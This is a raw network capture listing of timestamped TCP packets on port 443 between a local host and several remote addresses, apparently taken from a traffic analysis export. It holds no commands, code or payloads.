Jan 3, 2025 14:30:45.999342918 CET	49762	443	192.168.2.4	142.250.186.110
Jan 3, 2025 14:30:45.999429941 CET	49762	443	192.168.2.4	142.250.186.110
Jan 3, 2025 14:30:45.999443054 CET	443	49762	142.250.186.110	192.168.2.4
Jan 3, 2025 14:30:46.425508022 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.425704002 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.425713062 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.426069021 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.426142931 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.426757097 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.426806927 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.427983999 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.428045988 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.428132057 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.428138971 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.428152084 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.473661900 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.473668098 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.551040888 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:46.551103115 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:46.551628113 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:46.551637888 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:46.553849936 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:46.553855896 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:46.640760899 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.641529083 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.641577959 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.642389059 CET	49765	443	192.168.2.4	142.250.185.142
Jan 3, 2025 14:30:46.642394066 CET	443	49765	142.250.185.142	192.168.2.4
Jan 3, 2025 14:30:46.999336004 CET	49755	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:47.036546946 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.036590099 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.036662102 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.036979914 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.036988020 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.409574032 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.409631968 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.409662962 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.410705090 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.410705090 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.711746931 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.711842060 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.712282896 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.712287903 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.713944912 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.713949919 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.714025974 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.714036942 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.717255116 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.717269897 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.721261978 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.721281052 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.723694086 CET	49768	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.723709106 CET	443	49768	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.723767996 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.723784924 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.723968029 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.723975897 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.723998070 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724009991 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.724028111 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724039078 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.724076986 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724093914 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.724112034 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724121094 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.724137068 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724147081 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:47.724158049 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:47.724159956 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.047161102 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.047197104 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.047297955 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.047549963 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.047564983 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.697294950 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.697357893 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.697838068 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.697845936 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.699398041 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.699403048 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.699486971 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.699510098 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.699606895 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.699629068 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:48.699692011 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:48.699703932 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.114073992 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.114137888 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.114160061 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.114198923 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.114204884 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.114243984 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.117641926 CET	49770	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.117656946 CET	443	49770	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.790702105 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.790775061 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.790790081 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.790803909 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:49.790849924 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.865057945 CET	49771	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:49.865072012 CET	443	49771	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.094954967 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.094995022 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.095067978 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.095833063 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.095844984 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.778393030 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.778484106 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.779094934 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.779103994 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.780828953 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.780834913 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.780896902 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.780911922 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.780917883 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.780921936 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.781006098 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.781024933 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.781266928 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.781286955 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.781291962 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.781295061 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.781436920 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.781450987 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:50.801867962 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:50.801882029 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:51.097918034 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.097953081 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:51.098050117 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.098261118 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.098275900 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:51.754435062 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:51.754532099 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.755099058 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.755106926 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:51.757350922 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:51.757356882 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.110779047 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.110865116 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.110873938 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.110944986 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.111670971 CET	49773	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.111691952 CET	443	49773	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.146549940 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.146594048 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.146713018 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.147258997 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.147272110 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.553338051 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.553426981 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.553494930 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.662935019 CET	49774	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.662947893 CET	443	49774	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.805026054 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.805138111 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.825853109 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.825864077 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839467049 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839473009 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839629889 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839648962 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839706898 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839720964 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839792013 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839802980 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839890957 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839899063 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.839915991 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.839934111 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840009928 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840024948 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840048075 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840054989 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840091944 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840097904 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840298891 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840312004 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840321064 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840323925 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840344906 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840356112 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840394020 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840415955 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:52.840434074 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:52.840441942 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.138703108 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.138737917 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.138818979 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.139121056 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.139136076 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.787096977 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.787173033 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.787727118 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.787734985 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789434910 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789439917 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789494038 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789508104 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789516926 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789521933 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789601088 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789613962 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789622068 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789634943 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:53.789700985 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:53.789716959 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.168134928 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.168221951 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.168304920 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:54.172410965 CET	49775	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:54.172429085 CET	443	49775	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.917201996 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.917269945 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:54.917270899 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:54.917321920 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:54.918205023 CET	49776	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:54.918217897 CET	443	49776	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.167628050 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.167650938 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.167718887 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.168250084 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.168263912 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.808965921 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.809036970 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.882991076 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.882996082 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885009050 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885013103 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885088921 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885097027 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885147095 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885152102 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885205984 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885219097 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885263920 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885276079 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885374069 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885386944 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885447025 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885458946 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885551929 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885560989 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885584116 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885607958 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885632038 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885644913 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885776043 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885787964 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:55.885807991 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:55.885819912 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.205440998 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.205471992 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.205568075 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.205831051 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.205846071 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.852598906 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.852653980 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.853187084 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.853190899 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.854898930 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.854903936 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.854976892 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.854994059 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.854999065 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855003119 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855078936 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855098009 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855115891 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855122089 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855133057 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855137110 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855170012 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855180025 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855197906 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855210066 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855241060 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855274916 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855284929 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855297089 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855302095 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855336905 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855350971 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855362892 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855369091 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855448008 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855474949 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855474949 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855493069 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855504990 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855511904 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855519056 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855546951 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855546951 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855570078 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855570078 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855593920 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855603933 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855628014 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855652094 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855685949 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855701923 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855707884 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855726004 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855729103 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.855740070 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855792999 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855809927 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855853081 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.855874062 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.864994049 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:56.865139961 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:56.871509075 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.207175016 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.207237005 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.207237959 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.207278013 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.208410025 CET	49778	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.208425045 CET	443	49778	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.231467009 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.231518030 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.231604099 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.231779099 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.231797934 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.871130943 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.871191025 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.871539116 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.871551037 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873217106 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873225927 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873291969 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873316050 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873331070 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873341084 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873398066 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873437881 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873466015 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873481989 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873555899 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873578072 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873614073 CET	49793	443	192.168.2.4	116.203.13.109
